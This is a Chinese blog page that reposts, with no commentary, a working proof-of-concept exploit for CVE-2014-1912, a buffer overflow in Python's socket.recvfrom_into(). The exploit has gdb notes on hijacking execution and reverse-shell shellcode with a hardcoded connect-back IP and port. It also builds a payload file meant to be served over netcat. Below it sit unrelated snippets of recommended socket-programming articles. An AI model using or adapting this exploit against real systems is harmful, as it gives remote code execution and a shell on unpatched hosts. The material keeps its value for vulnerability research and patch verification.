python recvfrom函数详解_CVE-2014-1912 Python‘socket.recvfrom_into’函数缓冲区溢出漏洞-漏洞情报、漏洞详情、安全漏洞、CVE - 安全客,安全资...

最新推荐文章于 2024-02-14 09:56:34 发布
最新推荐文章于 2024-02-14 09:56:34 发布
阅读量437 收藏
点赞数
文章标签: python recvfrom函数详解

#!/usr/bin/env python

'''

# Exploit Title: python socket.recvfrom_into() remote buffer overflow

# Date: 21/02/2014

# Exploit Author: @sha0coder

# Vendor Homepage: python.org

# Version: python2.7 and python3

# Tested on: linux 32bit + python2.7

# CVE : CVE-2014-1912

socket.recvfrom_into() remote buffer overflow Proof of concept

by @sha0coder

TODO: rop to evade stack nx

(gdb) x/i $eip

=> 0x817bb28:mov eax,DWORD PTR [ebx+0x4] <--- ebx full control => eax full conrol

0x817bb2b:test BYTE PTR [eax+0x55],0x40

0x817bb2f:jne 0x817bb38 -->

...

0x817bb38:mov eax,DWORD PTR [eax+0xa4] <--- eax full control again

0x817bb3e:test eax,eax

0x817bb40:jne 0x817bb58 -->

...

0x817bb58:mov DWORD PTR [esp],ebx

0x817bb5b:call eax <--------------------- indirect fucktion call ;)

$ ./pyrecvfrominto.py

egg file generated

$ cat egg | nc -l 8080 -vv

... when client connects ... or wen we send the evil buffer to the server ...

0x0838591c in ?? ()

1: x/5i $eip

=> 0x838591c:int3 <--------- LANDED!!!!!

0x838591d:xor eax,eax

0x838591f:xor ebx,ebx

0x8385921:xor ecx,ecx

0x8385923:xor edx,edx

'''

import struct

def off(o):

return struct.pack('L',o)

reverseIP = '\xc0\xa8\x04\x34' #'\xc0\xa8\x01\x0a'

reversePort = '\x7a\x69'

#shellcode from exploit-db.com, (remove the sigtrap)

shellcode = "\xcc\x31\xc0\x31\xdb\x31\xc9\x31\xd2"\

"\xb0\x66\xb3\x01\x51\x6a\x06\x6a"\

"\x01\x6a\x02\x89\xe1\xcd\x80\x89"\

"\xc6\xb0\x66\x31\xdb\xb3\x02\x68"+\

reverseIP+"\x66\x68"+reversePort+"\x66\x53\xfe"\

"\xc3\x89\xe1\x6a\x10\x51\x56\x89"\

"\xe1\xcd\x80\x31\xc9\xb1\x03\xfe"\

"\xc9\xb0\x3f\xcd\x80\x75\xf8\x31"\

"\xc0\x52\x68\x6e\x2f\x73\x68\x68"\

"\x2f\x2f\x62\x69\x89\xe3\x52\x53"\

"\x89\xe1\x52\x89\xe2\xb0\x0b\xcd"\

"\x80"

shellcode_sz = len(shellcode)

print 'shellcode sz %d' % shellcode_sz

ebx = 0x08385908

sc_off = 0x08385908+20

padd = 'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMM'

'''

+------------+----------------------+ +--------------------+

| | | | |

V | | V |

'''

buff = 'aaaa' + off(ebx) + 'aaaaaAAA'+ off(ebx) + shellcode + padd + off(sc_off) # .. and landed ;)

print 'buff sz: %s' % len(buff)

open('egg','w').write(buff)

weixin_39819661
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python open 函数漏洞_Python socket.recvfrom_info()函数中的远程代码执行漏洞
weixin_29497981的博客
02-09 215
最近,pastebin上发布了一个exploit,是关于Python 2.7和3.x版本中的socket.recvfrom_into()函数中一个远程代码执行漏洞(栈溢出)的PoC。(有些地方pastebin.com可能被墙了,为了方便,译者把它拷贝到文章里。)原exploit如下:#!/usr/bin/envpython'''#ExploitTitle:pythonsocket.rec...
python socket recvfrom_Pythonsocket.recvfrom()不返回任何地址
weixin_39612726的博客
12-18 987
我正在尝试编写示例here的Python版本,但是由于某种原因,我在户端和服务器中对socket.recvfrom()的每次调用都将其地址返回值为None.我唯一能想到的可能是套接字是STREAM套接字,但是当我尝试将类型更改为socket.SOCK_DGRAM时,调用socket.listen()时出错.我该如何解决这个问题?def server(port):sock = socket.soc...
python网络通信库_python socket类库t介绍
weixin_39621819的博客
11-25 354
一、Socket是什么1、socket通常也称作“套接字”,用于描述IP地址和端口,是一个通信链的句柄。应用程序通常通过“套接字”向网络发出请求或者应答网络请求。2、socket的个人理解:Socket看作是一种特殊的文件,一些socket函数就是对其进行的操作(读/写IO、打开、关闭)二、Socket typesocket.AF_UNIX 只能够用于单一的Unix系统进程间通信socket.AF...
python udp socket.recvfrom(bufsize[, flags])(从套接字接收数据)
Dontla的博客
12-31 1万+
socket.recvfrom(bufsize[, flags]) Receive data from the socket. The return value is a pair (bytes, address) where bytes is a bytes object representing the data received and address is the address of t...
python recvfrom函数详解_Python socket.recvfrom方法代码示例
weixin_39662955的博客
12-07 1851
# 需要导入模块: import socket [as 别名]# 或者: from socket import recvfrom [as 别名]def __discover_device__(self):if TOBII_DISCOVERY_ALLOWED == False:logging.error("Device discovery is not available due to a miss...
tcp.rar_UDP recvfrom_tcp_tcp sendto_udp 函数_udp_sendto
09-24
`recvfrom`用于接收来自任何源的数据,格式为`recvfrom(sockfd, buffer, len, flags, src_addr, addrlen)`,其中`sockfd`是UDP套接字,`buffer`用来存储接收到的数据,`len`是缓冲区大小,`flags`是可选参数,`src_...
UDP_Demo.rar_UDP_socket-udp通讯_socket编程_udp 通讯_udp通讯
09-20
6. **接收数据**:使用`recvfrom()`函数接收数据,此函数可以获取发送者的地址信息,这对于广播或多播特别有用,因为可以知道数据的来源。 7. **错误处理**:在进行socket编程时,需要处理各种可能的错误,如套接字...
UDP-android-and-python.rar_android Python_android udp_between
09-23
3. **Python socket编程**:了解socket模块,创建UDP套接字(socket.SOCK_DGRAM),绑定到特定端口,使用socket.recvfrom()和socket.sendto()函数收发数据。 4. **数据编码与解码**:Android和Python之间通信时,...
ntp.rar_c ntp_linux NTP_linux-ntp.rar_ntp_ntp linux
09-20
5. **接收ntp协议包**:通过`recvfrom()`函数接收来自NTP服务器的响应。这个函数会返回服务器返回的数据,同样包含NTP协议包的结构体,可以从中提取出服务器的时间信息。 6. **结束**:处理完收到的NTP数据包后,...
套接字socket编程文档.rar_MultiGet-1.1.4_linux_linux socket_linux 编程_soc
09-23
通过setsockopt()和getsockopt()函数,可以设置或查询套接字的选项,如超时、重试次数、缓冲区大小等。控制消息(例如,SOCK_CMSG)则允许在套接字通信中传递额外信息,如文件描述符、地址信息等。 五、异常处理和...
python recvfrom设置超时_如何在pythonsocket recv方法上设置超时?
weixin_28766939的博客
03-01 3230
我需要在pythonsocket recv方法上设置超时。 怎么做?仅供参考,如果您选择使用超时...您需要知道如何处理超时。 这个SO问题讨论了超时发生时的处理:stackoverflow.com/questions/16745409典型的方法是使用select()等待数据可用或直到超时发生。仅在数据实际可用时调用recv()。为了安全起见,我们还将套接字设置为非阻塞模式,以确保recv()永...
Python socket库 接收数据的方法【recv(),recvfrom(),recv_into(),readline() 和 readlines()】
最新发布
YHKKun的博客
02-14 4237
但它接收数据并直接存储在一个预分配的字节数组中,而不是返回一个新的字节对象。方法是TCP套接字中最常用的接收数据方法。它用于从已连接的套接字接收数据。方法通常用于UDP套接字,用于接收来自任意户端的数据。对于文本模式的套接字(即使用。为非阻塞模式),可以使用。方法从套接字读取文本行。
python recvfrom函数详解_recvfrom函数详解
热门推荐
weixin_32357285的博客
02-09 1万+
int ret; srtuct sockaddr_in from; ret=revcfrom(sock,recvbuf,BUFSIZErecvfrom函数用于从(已连接)套接口上接收数据,并捕获数据发送源的地址。 本函数用于从(已连接)套接口上接收数据,并捕获数据发送源的地址。 对于SOCK_STREAM类型的套接口,最多可接收缓冲区大小个数据。udp的recvfrom函数,能接收指定ip和端口发...
python recvfrom函数详解_Python总结之 recvrecv_from
weixin_39533896的博客
11-28 1968
在udp编程中,会发现,在利用socke接收数据时用的时recv_from,在tcp编程中用的是recv。但是,细心的你会发现,udp中接收端口的时recv_rom,在tcp中则是accept,为什么呢?因为recvrecvfrom是可以替换使用的,只是recvfrom多了两个参数,可以用来接收对端的地址信息,这个对于udp这种无连接的,可以很方便地进行回复。下面是源码:def recvfrom...
Pythonsocket
dzh1125641239的博客
09-29 807
1.socket Socket又称&quot;套接字&quot;,应用程序通常通过&quot;套接字&quot;向网络发出请求或者应答网络请求,使主机间或者一台计算机上的进程间可以通讯。 2.socket编程 import socket print(socket.gethostname()) # 'www.baiu.com'根据域名获取对应服务器的ip地址 print(socket.gethostbyname('www.baidu...
pythonrecvfrom_pythonrecvfrom返回的地址的第二部分是什么?
weixin_39943101的博客
12-18 93
我正在使用http://wiki.python.org/moin/UdpCommunication中的那两段代码服务器:import socketUDP_IP="127.0.0.1"UDP_PORT=5005sock = socket.socket( socket.AF_INET, # Internetsocket.SOCK_DGRAM ) # UDPsock.bind( (UDP_IP,UDP_...
SocketPython UDP和TCP的socket实例
weixin_34162695的博客
05-22 110
Socket UDP socket UDP Server端 UDP Client端 TCP socket TCP Server端 TCP Client端 总结 代码下载 Socket Socket又称”套接字”,应用程序通常通过”套接字”向网络发出请求或者应答网络请求。 具体定义看百科 socket有两种,一...
python scket 通讯_Python采用socket模拟TCP通讯的实现方法
weixin_39730671的博客
11-23 91
本文实例讲述了Python采用socket模拟TCP通讯的实现方法。分享给大家供大家参考。具体实现方法如下:对于TCP server端的创建而言,分为如下几个步骤:创建socket对象(socket):其中两个参数分别为Address Family(如AF_INET为IPV4,AF_INET6为IPV6,AF_UNIX为UNIX域协议族)、socket类型(如SOCK_STREAM为TCP,SOC...
python高级 笔记 05(网络通信UDP)
weixin_46969441的博客
01-03 3036
UDP接收端绑定ip ''' 1.导入模块 2.创建套接字 3.绑定端口 4.接受对方发送的数据 5.解码数据 6.输出显示 7.关闭套接字 ''' # 1.导入模块 import socket # 2.创建套接字 UDP_socket = socket.socket(socket.AF_INET,socket.SOCK_DGRAM) # 3.绑定端口 UDP_socket.bind(("192.168.150.25",6666)) # UDP_socket.bind(("127.0.0.1表示本机ip地
TCP/IP Socket编程:recvfrom函数详解
"recvfrom函数参数说明-Socket网络编程" 在Socket网络编程中,`recvfrom`函数是一个关键的函数,用于从套接字接收数据。它适用于无连接的UDP(用户数据报协议)以及在某些情况下,有连接的TCP(传输控制协议)套接...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值